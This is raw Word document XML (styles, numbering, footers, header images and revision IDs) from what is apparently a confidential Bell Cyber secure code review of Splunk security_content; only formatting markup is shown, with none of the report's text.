    <w:sectPr w:rsidR="00AC6899" w:rsidRPr="009E357B" w:rsidSect="0034020C">
      <w:headerReference w:type="even" r:id="rId12"/>
      <w:headerReference w:type="default" r:id="rId13"/>
      <w:footerReference w:type="even" r:id="rId14"/>
      <w:footerReference w:type="default" r:id="rId15"/>
      <w:headerReference w:type="first" r:id="rId16"/>
      <w:footerReference w:type="first" r:id="rId17"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="2203" w:right="1440" w:bottom="1080" w:left="1800"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A41DDA" w14:textId="77777777" w:rsidR="00205662" w:rsidRDefault="00205662">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3798BE6A" w14:textId="77777777" w:rsidR="00205662" w:rsidRDefault="002056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itres CS)">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Times New Roman (Corps CS)">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="020B06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99B78" w14:textId="77777777" w:rsidR="002F0607" w:rsidRDefault="002F0607">
    <w:pPr>
      <w:spacing w:before="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3C556" w14:textId="77777777" w:rsidR="002F0607" w:rsidRDefault="002F0607">
    <w:pPr>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto" w:after="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Bell Cyber  |  STIRT Secure Code Review  |  Splunk security_content  |  CONFIDENTIAL    |    Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:t>1</w:t>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:t>1</w:t>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6E6DD" w14:textId="77777777" w:rsidR="002F0607" w:rsidRDefault="002F0607">
    <w:pPr>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto" w:after="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r/>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Bell Cyber  |  STIRT Secure Code Review  |  Splunk security_content  |  CONFIDENTIAL    |    Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:t>1</w:t>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="595959"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> NUMPAGES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2BEB24" w14:textId="77777777" w:rsidR="00205662" w:rsidRDefault="00205662">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14412F12" w14:textId="77777777" w:rsidR="00205662" w:rsidRDefault="002056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0115F" w14:textId="77777777" w:rsidR="002F0607" w:rsidRDefault="002F0607">
    <w:pPr>
      <w:spacing w:before="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7CEC1" w14:textId="77777777" w:rsidR="002F0607" w:rsidRDefault="002F0607">
    <w:pPr>
      <w:spacing w:before="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FBC49" w14:textId="77777777" w:rsidR="0034020C" w:rsidRPr="00A63057" w:rsidRDefault="003A1FE1" w:rsidP="00A63057">
    <w:r w:rsidRPr="00A36553">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6203407D" wp14:editId="31CDF266">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>4508863</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>857377</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1227908" cy="544557"/>
          <wp:effectExtent l="0" t="0" r="4445"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rotWithShape="1">
                  <a:blip r:embed="rId1"/>
                  <a:srcRect l="-965" r="8297"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1252577" cy="55549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4020C" w:rsidRPr="00A36553">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44D8F79D" wp14:editId="52A02397">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:align>left</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-396875</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1092835" cy="1887855"/>
          <wp:effectExtent l="2540" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="6" name="Imag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a:extLst>
                      <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                        <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
                      </a:ext>
                    </a:extLst>
                  </pic:cNvPr>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill rotWithShape="1">
                  <a:blip r:embed="rId2"/>
                  <a:srcRect r="85843" b="81105"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm rot="5400000">
                    <a:off x="0" y="0"/>
                    <a:ext cx="1092835" cy="18878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1F2AF4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286BEC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F065BA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E9A217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E260B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10E314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1A6E08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5A2DCC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94E59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9A28D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D4E7ACF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D69CC3D6"/>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11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2DA60282"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D69CC3D6"/>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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70A12C9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47863BC8"/>
    <w:lvl w:ilvl="0" w:tplc="00110409">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="10090017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1009001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1009000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="10090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1009001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1009000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="10090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1009001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7200"/>
        </w:tabs>
        <w:ind w:left="7200" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1858737592">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2099909601">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="340737424">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2120491787">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1199589584">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1345206226">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1149902890">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="840705507">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1336149699">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="19014341">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="678389133">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1580753339">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="12722750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2"/>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enforcement="0"/>
  <w:autoFormatOverride/>
  <w:styleLockTheme/>
  <w:styleLockQFSet/>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0B1"/>
    <w:rsid w:val="000004B7"/>
    <w:rsid w:val="00004824"/>
    <w:rsid w:val="00014B51"/>
    <w:rsid w:val="00024A27"/>
    <w:rsid w:val="00037BC0"/>
    <w:rsid w:val="00040C2B"/>
    <w:rsid w:val="000529E6"/>
    <w:rsid w:val="00053658"/>
    <w:rsid w:val="000567C7"/>
    <w:rsid w:val="000733DF"/>
    <w:rsid w:val="000A7BEA"/>
    <w:rsid w:val="000B505F"/>
    <w:rsid w:val="000B73F5"/>
    <w:rsid w:val="000C347B"/>
    <w:rsid w:val="000D016C"/>
    <w:rsid w:val="000D1F62"/>
    <w:rsid w:val="000E4A21"/>
    <w:rsid w:val="000E6636"/>
    <w:rsid w:val="000F4168"/>
    <w:rsid w:val="00115A1F"/>
    <w:rsid w:val="00132600"/>
    <w:rsid w:val="00145421"/>
    <w:rsid w:val="00151930"/>
    <w:rsid w:val="001663F6"/>
    <w:rsid w:val="001712B8"/>
    <w:rsid w:val="00172224"/>
    <w:rsid w:val="00174C28"/>
    <w:rsid w:val="00177590"/>
    <w:rsid w:val="00181074"/>
    <w:rsid w:val="00197CAB"/>
    <w:rsid w:val="001B0D93"/>
    <w:rsid w:val="001C5B78"/>
    <w:rsid w:val="001E1044"/>
    <w:rsid w:val="001E270F"/>
    <w:rsid w:val="001E7FC9"/>
    <w:rsid w:val="00205662"/>
    <w:rsid w:val="002140A1"/>
    <w:rsid w:val="00217577"/>
    <w:rsid w:val="00224D19"/>
    <w:rsid w:val="00233BD0"/>
    <w:rsid w:val="0024104A"/>
    <w:rsid w:val="00244F87"/>
    <w:rsid w:val="0026678D"/>
    <w:rsid w:val="002721AB"/>
    <w:rsid w:val="002814AD"/>
    <w:rsid w:val="002C2036"/>
    <w:rsid w:val="002C2198"/>
    <w:rsid w:val="002E7027"/>
    <w:rsid w:val="002F0607"/>
    <w:rsid w:val="002F7C28"/>
    <w:rsid w:val="0032600F"/>
    <w:rsid w:val="00327C90"/>
    <w:rsid w:val="003339D7"/>
    <w:rsid w:val="0034020C"/>
    <w:rsid w:val="00350562"/>
    <w:rsid w:val="00353CEE"/>
    <w:rsid w:val="00363BD1"/>
    <w:rsid w:val="003810EF"/>
    <w:rsid w:val="00383D3A"/>
    <w:rsid w:val="003A1FE1"/>
    <w:rsid w:val="003A3BD7"/>
    <w:rsid w:val="003A5AEA"/>
    <w:rsid w:val="003C14A1"/>
    <w:rsid w:val="003C5911"/>
    <w:rsid w:val="003C71A5"/>
    <w:rsid w:val="003E3857"/>
    <w:rsid w:val="003E6576"/>
    <w:rsid w:val="003E7030"/>
    <w:rsid w:val="003F7DA7"/>
    <w:rsid w:val="00410839"/>
    <w:rsid w:val="0041185E"/>
    <w:rsid w:val="00413512"/>
    <w:rsid w:val="00422E2B"/>
    <w:rsid w:val="00424B3A"/>
    <w:rsid w:val="00426922"/>
    <w:rsid w:val="004342C5"/>
    <w:rsid w:val="00444D40"/>
    <w:rsid w:val="00446BC1"/>
    <w:rsid w:val="004616BE"/>
    <w:rsid w:val="00471C2D"/>
    <w:rsid w:val="00474DB9"/>
    <w:rsid w:val="0048202B"/>
    <w:rsid w:val="0048331B"/>
    <w:rsid w:val="00484D6C"/>
    <w:rsid w:val="004A1325"/>
    <w:rsid w:val="004A74E4"/>
    <w:rsid w:val="004B025E"/>
    <w:rsid w:val="004B078E"/>
    <w:rsid w:val="004B0BEE"/>
    <w:rsid w:val="004B1319"/>
    <w:rsid w:val="004B44A5"/>
    <w:rsid w:val="004C1315"/>
    <w:rsid w:val="004D00FB"/>
    <w:rsid w:val="004D33CC"/>
    <w:rsid w:val="004F1FFB"/>
    <w:rsid w:val="005179D8"/>
    <w:rsid w:val="0052164D"/>
    <w:rsid w:val="005330C8"/>
    <w:rsid w:val="005345DF"/>
    <w:rsid w:val="00535A4C"/>
    <w:rsid w:val="0054515B"/>
    <w:rsid w:val="0055176D"/>
    <w:rsid w:val="00556757"/>
    <w:rsid w:val="00556D3B"/>
    <w:rsid w:val="00562657"/>
    <w:rsid w:val="00562DA5"/>
    <w:rsid w:val="00570752"/>
    <w:rsid w:val="00575F82"/>
    <w:rsid w:val="00591BB7"/>
    <w:rsid w:val="0059265E"/>
    <w:rsid w:val="005A381B"/>
    <w:rsid w:val="005B1978"/>
    <w:rsid w:val="005B4471"/>
    <w:rsid w:val="005C3DCB"/>
    <w:rsid w:val="005C5D23"/>
    <w:rsid w:val="005E22DC"/>
    <w:rsid w:val="005F6D00"/>
    <w:rsid w:val="005F7AE9"/>
    <w:rsid w:val="00602077"/>
    <w:rsid w:val="0061132F"/>
    <w:rsid w:val="00621061"/>
    <w:rsid w:val="00637DC7"/>
    <w:rsid w:val="006516B6"/>
    <w:rsid w:val="0066217C"/>
    <w:rsid w:val="00681634"/>
    <w:rsid w:val="006B3FE2"/>
    <w:rsid w:val="006B63B9"/>
    <w:rsid w:val="006C1AB0"/>
    <w:rsid w:val="006D7891"/>
    <w:rsid w:val="006E0668"/>
    <w:rsid w:val="006E0869"/>
    <w:rsid w:val="00701A74"/>
    <w:rsid w:val="00712160"/>
    <w:rsid w:val="0073064B"/>
    <w:rsid w:val="007333C3"/>
    <w:rsid w:val="007362F9"/>
    <w:rsid w:val="00736995"/>
    <w:rsid w:val="007410E9"/>
    <w:rsid w:val="00741E27"/>
    <w:rsid w:val="00750910"/>
    <w:rsid w:val="0075106D"/>
    <w:rsid w:val="00761ACA"/>
    <w:rsid w:val="00772D32"/>
    <w:rsid w:val="007B2236"/>
    <w:rsid w:val="007B327A"/>
    <w:rsid w:val="007E5B8C"/>
    <w:rsid w:val="007F1CF3"/>
    <w:rsid w:val="007F3959"/>
    <w:rsid w:val="008049C4"/>
    <w:rsid w:val="00804D48"/>
    <w:rsid w:val="00814196"/>
    <w:rsid w:val="00817C76"/>
    <w:rsid w:val="00826CFB"/>
    <w:rsid w:val="00843A32"/>
    <w:rsid w:val="008501B6"/>
    <w:rsid w:val="00850FA2"/>
    <w:rsid w:val="00853D70"/>
    <w:rsid w:val="00862C0A"/>
    <w:rsid w:val="00866BC6"/>
    <w:rsid w:val="00874413"/>
    <w:rsid w:val="00876EAD"/>
    <w:rsid w:val="00887CB7"/>
    <w:rsid w:val="008910F1"/>
    <w:rsid w:val="008956A7"/>
    <w:rsid w:val="008A040E"/>
    <w:rsid w:val="008A30EF"/>
    <w:rsid w:val="008A63E0"/>
    <w:rsid w:val="008D062C"/>
    <w:rsid w:val="008E00CA"/>
    <w:rsid w:val="008F34B3"/>
    <w:rsid w:val="008F5671"/>
    <w:rsid w:val="0090026C"/>
    <w:rsid w:val="00925EAD"/>
    <w:rsid w:val="00933E9A"/>
    <w:rsid w:val="00937259"/>
    <w:rsid w:val="00951427"/>
    <w:rsid w:val="00956633"/>
    <w:rsid w:val="00972306"/>
    <w:rsid w:val="009729CD"/>
    <w:rsid w:val="009971C7"/>
    <w:rsid w:val="009A16B4"/>
    <w:rsid w:val="009B1711"/>
    <w:rsid w:val="009C1DEC"/>
    <w:rsid w:val="009C2C65"/>
    <w:rsid w:val="009C4893"/>
    <w:rsid w:val="009C664C"/>
    <w:rsid w:val="009D5E8E"/>
    <w:rsid w:val="009D677F"/>
    <w:rsid w:val="009E357B"/>
    <w:rsid w:val="009E5D2A"/>
    <w:rsid w:val="009E6175"/>
    <w:rsid w:val="009F5BC2"/>
    <w:rsid w:val="009F7007"/>
    <w:rsid w:val="009F7875"/>
    <w:rsid w:val="00A05EBF"/>
    <w:rsid w:val="00A060AD"/>
    <w:rsid w:val="00A1617F"/>
    <w:rsid w:val="00A36553"/>
    <w:rsid w:val="00A42F66"/>
    <w:rsid w:val="00A449C7"/>
    <w:rsid w:val="00A47335"/>
    <w:rsid w:val="00A47864"/>
    <w:rsid w:val="00A61316"/>
    <w:rsid w:val="00A63057"/>
    <w:rsid w:val="00A81ADA"/>
    <w:rsid w:val="00A84074"/>
    <w:rsid w:val="00A862E1"/>
    <w:rsid w:val="00A93661"/>
    <w:rsid w:val="00A947CE"/>
    <w:rsid w:val="00AA1C6C"/>
    <w:rsid w:val="00AA5384"/>
    <w:rsid w:val="00AA74FB"/>
    <w:rsid w:val="00AB27E5"/>
    <w:rsid w:val="00AC6899"/>
    <w:rsid w:val="00AD3CA3"/>
    <w:rsid w:val="00AD4DDB"/>
    <w:rsid w:val="00AE05FF"/>
    <w:rsid w:val="00AE6EF6"/>
    <w:rsid w:val="00AF03B8"/>
    <w:rsid w:val="00AF0F01"/>
    <w:rsid w:val="00AF19A4"/>
    <w:rsid w:val="00B23849"/>
    <w:rsid w:val="00B324DB"/>
    <w:rsid w:val="00B40FD3"/>
    <w:rsid w:val="00B41C2A"/>
    <w:rsid w:val="00B5027E"/>
    <w:rsid w:val="00B52C1E"/>
    <w:rsid w:val="00B56B72"/>
    <w:rsid w:val="00B66832"/>
    <w:rsid w:val="00B67B10"/>
    <w:rsid w:val="00B77887"/>
    <w:rsid w:val="00B906C9"/>
    <w:rsid w:val="00BA3C96"/>
    <w:rsid w:val="00BA7850"/>
    <w:rsid w:val="00BB0AC3"/>
    <w:rsid w:val="00BB20B1"/>
    <w:rsid w:val="00C0067C"/>
    <w:rsid w:val="00C0130E"/>
    <w:rsid w:val="00C01949"/>
    <w:rsid w:val="00C0768C"/>
    <w:rsid w:val="00C1584A"/>
    <w:rsid w:val="00C23265"/>
    <w:rsid w:val="00C26780"/>
    <w:rsid w:val="00C32295"/>
    <w:rsid w:val="00C35F54"/>
    <w:rsid w:val="00C45451"/>
    <w:rsid w:val="00C52AEB"/>
    <w:rsid w:val="00C57552"/>
    <w:rsid w:val="00C609D7"/>
    <w:rsid w:val="00C65037"/>
    <w:rsid w:val="00C87B32"/>
    <w:rsid w:val="00C94A3C"/>
    <w:rsid w:val="00C957A9"/>
    <w:rsid w:val="00C95B4F"/>
    <w:rsid w:val="00CA379A"/>
    <w:rsid w:val="00CB77F2"/>
    <w:rsid w:val="00CF3B9F"/>
    <w:rsid w:val="00CF58E1"/>
    <w:rsid w:val="00D13EEB"/>
    <w:rsid w:val="00D263DB"/>
    <w:rsid w:val="00D30C1A"/>
    <w:rsid w:val="00D4047B"/>
    <w:rsid w:val="00D7090D"/>
    <w:rsid w:val="00DC3641"/>
    <w:rsid w:val="00DE21DD"/>
    <w:rsid w:val="00DE57C5"/>
    <w:rsid w:val="00DF6E5C"/>
    <w:rsid w:val="00DF701A"/>
    <w:rsid w:val="00E002BD"/>
    <w:rsid w:val="00E04245"/>
    <w:rsid w:val="00E05698"/>
    <w:rsid w:val="00E070BF"/>
    <w:rsid w:val="00E32470"/>
    <w:rsid w:val="00E42C4C"/>
    <w:rsid w:val="00E51282"/>
    <w:rsid w:val="00E5715A"/>
    <w:rsid w:val="00E86E05"/>
    <w:rsid w:val="00E90849"/>
    <w:rsid w:val="00E96821"/>
    <w:rsid w:val="00EA7B09"/>
    <w:rsid w:val="00EB31E0"/>
    <w:rsid w:val="00EC492F"/>
    <w:rsid w:val="00EE7CE9"/>
    <w:rsid w:val="00EF7E31"/>
    <w:rsid w:val="00F04E20"/>
    <w:rsid w:val="00F222B8"/>
    <w:rsid w:val="00F25A36"/>
    <w:rsid w:val="00F318EF"/>
    <w:rsid w:val="00F414EC"/>
    <w:rsid w:val="00F416AC"/>
    <w:rsid w:val="00F4554E"/>
    <w:rsid w:val="00F60D0A"/>
    <w:rsid w:val="00F65859"/>
    <w:rsid w:val="00F74FFD"/>
    <w:rsid w:val="00F80113"/>
    <w:rsid w:val="00F939C2"/>
    <w:rsid w:val="00FA6627"/>
    <w:rsid w:val="00FB03CE"/>
    <w:rsid w:val="00FB31DD"/>
    <w:rsid w:val="00FE507A"/>
    <w:rsid w:val="00FE52D8"/>
    <w:rsid w:val="00FF3887"/>
    <w:rsid w:val="00FF7DF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936A7C"/>
  <w15:docId w15:val="{4C48A868-E08F-5F46-BCDA-ABC66CD33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Calibri"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="fr-CA" w:eastAsia="fr-CA" w:bidi="ar-SA"/>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0" w:unhideWhenUsed="1"/>
    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="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w:qFormat/>
    <w:rsid w:val="005179D8"/>
    <w:pPr>
      <w:spacing w:before="80" w:line="276" w:lineRule="auto" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Title"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00C01949"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:lineRule="auto" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="0B5CAB"/>
      <w:spacing w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="007362F9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="007362F9"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="0B5CA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7362F9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="007362F9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Address">
    <w:name w:val="Address"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005179D8"/>
    <w:pPr>
      <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:noProof/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Name-blue">
    <w:name w:val="Name - blue"/>
    <w:basedOn w:val="Address"/>
    <w:rsid w:val="0059265E"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="255897"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Employeetitle">
    <w:name w:val="Employee title"/>
    <w:basedOn w:val="Address"/>
    <w:rsid w:val="0059265E"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00772D32"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="320" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman (Titres CS)"/>
      <w:b/>
      <w:color w:val="0B5CAB"/>
      <w:spacing w:val="-4"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00772D32"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cs="Times New Roman (Titres CS)"/>
      <w:b/>
      <w:spacing w:val="-4"/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
